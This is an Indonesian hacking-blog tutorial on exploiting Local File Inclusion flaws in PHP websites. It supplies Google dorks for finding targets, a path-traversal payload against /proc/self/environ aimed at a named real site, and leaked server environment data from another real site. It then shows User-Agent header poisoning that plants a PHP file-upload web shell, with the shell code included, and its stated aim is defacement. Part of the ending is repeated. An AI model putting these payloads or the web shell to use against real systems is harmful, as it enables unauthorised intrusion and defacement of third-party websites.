.jpg)
Assalamualaikum ^_^
Selamat Pagi Sobat DetektetifH@cking, Nice Friday yeah :D ~ Pada kesempatan kali ini saya akan membagikan tutorial yang dikirim oleh teman saya ke kantor DetektifH@cking *cie elaah, bersyukur deh ane yang ngak bisa apa apa, punya banyak temen yang mau berbagi ke DetektifH@cking :D oke langsung saja yeah ;)
Sebelum Bahas Tutorial LFI saya akan Jelasin Singkat Apa Itu LFI ? :)
LFI (Local File Inclusion) adalah sebuah lubang pada site di mana attacker bisa mengakses semua file di dalam server dengan hanya melalui URL. << udah cuma gitu :D Singkat kan ?? :z
Bahan yang Dibutuhkan :
- Rokok + Kopi Kapal Api
- Camilan
- Tamper Data (https://addons.mozilla.org/en-US/firefox/addon/tamper-data/)
- shell / script file upload ..
- Dork + Kesabaran Dalam Mencari Site Bug LFI , :D
Dork list :
inurl:.php?(*)=(*)php , inurl:.php?(*)=mapa.php , inurl:.php?caminho=(*)php , inurl:.php?(*)=Sitemap.php
ingat !! Harus Ada .php dibelakang = !!
Misal : inurl:.php?pg=mapa.php << harus ada .php !!
Trick Search Dork LFI , by ./me !!
- buka translate.google.com , xixiixixxiixixi :D
- tulis text ente ke google translate yang berkaitan dengan file file di website !! Seperti = Sitemap , contact , daftar , dll ..
- translate text yang sobat tulis ke berbagai bahasa .. misal sitemap , translate ke portugal jadi , mapa
- masu''kan dork sobat ke google : inurl:.php?(*)=mapa.php << ingat Harus ada .php
- Success !! ;)
Oke Bahan Udah Lengkap + Trick Dork Jadul by ./me , tinggal Tutorialnya aja ya !! Ok Lest Go ;)
1. Kita nemuin website yang vuln LFI.
contoh : http://site.com/main.php?file=news.php
2.list target : http://www.ibriec.org/menara_perkebunan/index.php?open=../../../../../../../../../../proc/self/environ
3.coba kita ganti page_05.php pada list target diatas :
../../../../../../../../../proc/self/environ
4. Jika Sobat mendapatkan yang seperti ini :
SERVER_SIGNATURE=
Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.35 Server at baleman.co.id Port 80
UNIQUE_ID=Ua6ugso68-wAAF8wsfgAAAAKHTTP_USER_AGENT=Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0SERVER_PORT=80HTTP_HOST=baleman.co.idREDIRECT_HANDLER=application/x-httpd-php5DOCUMENT_ROOT=/home/s2400x14/public_htmlSCRIPT_FILENAME=/usr/local/cpanel/cgi-sys/php5REQUEST_URI=/index_1.php?hal=../../../../../../../../../../../proc/self/environSCRIPT_NAME=/cgi-sys/php5HTTP_CONNECTION=keep-alivePATH_INFO=/index_1.phpREMOTE_PORT=18429PATH=/usr/local/bin:/usr/bin:/binPWD=/usr/local/cpanel/cgi-sysSERVER_ADMIN=webmaster@baleman.co.idREDIRECT_STATUS=200REDIRECT_QUERY_STRING=hal=../../../../../../../../../../../proc/self/environHTTP_ACCEPT_LANGUAGE=en-US,en;q=0.5PATH_TRANSLATED=/home/s2400x14/public_html/index_1.phpHTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8REMOTE_ADDR=180.253.80.169SHLVL=0SERVER_NAME=baleman.co.idSERVER_SOFTWARE=Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.35QUERY_STRING=hal=../../../../../../../../../../../proc/self/environSERVER_ADDR=202.58.243.17GATEWAY_INTERFACE=CGI/1.1SERVER_PROTOCOL=HTTP/1.1HTTP_ACCEPT_ENCODING=gzip, deflateREDIRECT_URL=/index_1.phpREQUEST_METHOD=GETHTTP_COOKIE=__utma=247167511.668754680.1370401967.1370401967.1370401967.1; __utmb=247167511.1.10.1370401967; __utmc=247167511; __utmz=247167511.1370401967.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Home | Jad
atau keluar : Document ROOT dan ada User Agent Itu Web rentan LFI ,, OK Ternyata proc/self/environ dapat kita akses ! Lest Go ;)
5.Sekarang mari kita injeksi dengan kode dengan meracuni http-headernya/User Agent , Tools yang Tadi (Tamper Data Udah Didownload kan :f ) Ok Kalau Sudah , Lanjut ;)
6.buka tamper data di firefox lalu Buka URL Tadi Yang Rentan LFI , Klik Start Tamper lalu Reload Halaman Site..
7.Muncul Kotak Box , jangan dicentang continue tampering .. , klik TAMPER
8.Pada Kolom/Kotak User agent , Hapus Text Tersebut ganti dengan Code berikut :
*shell akan keluar di : localhost/[path]/namashell.php
9. Klik Oke .. , Stop Tamper !! Tamper data jangan di close
10.Muncul Sebuah File Upload Di Halaman Site Yang Rentan LFI tersebut
Nih ScreenShotnya : https://fbcdn-sphotos-e-a.akamaihd.net/hphotos-ak-ash4/424631_391238194318689_1778808128_n.jpg
11.Selanjutnya Upload Shell / Script Deface kamu ^_^
12.Success , Tinggal Diacak acak dalemnya :D
Just Hacking And Have Fun :t
Special Thanks to : Mr.Mx4rz atas kirimannya :)
<?php @copy($_FILES['file']['tmp_name'],$_FILES['file']['name']); ?><p>
Mr.Mx4rz Was Here !!</p>
<br> <form action="" method="post" enctype="multipart/form-data">
Filename: <input type="file" name="file" /><input type="submit" value="Submit" />
*shell akan keluar di : localhost/[path]/namashell.php
9. Klik Oke .. , Stop Tamper !! Tamper data jangan di close
10.Muncul Sebuah File Upload Di Halaman Site Yang Rentan LFI tersebut
Nih ScreenShotnya : https://fbcdn-sphotos-e-a.akamaihd.net/hphotos-ak-ash4/424631_391238194318689_1778808128_n.jpg
11.Selanjutnya Upload Shell / Script Deface kamu ^_^
12.Success , Tinggal Diacak acak dalemnya :D
Just Hacking And Have Fun :t
Special Thanks to : Mr.Mx4rz atas kirimannya :)
0 Comments: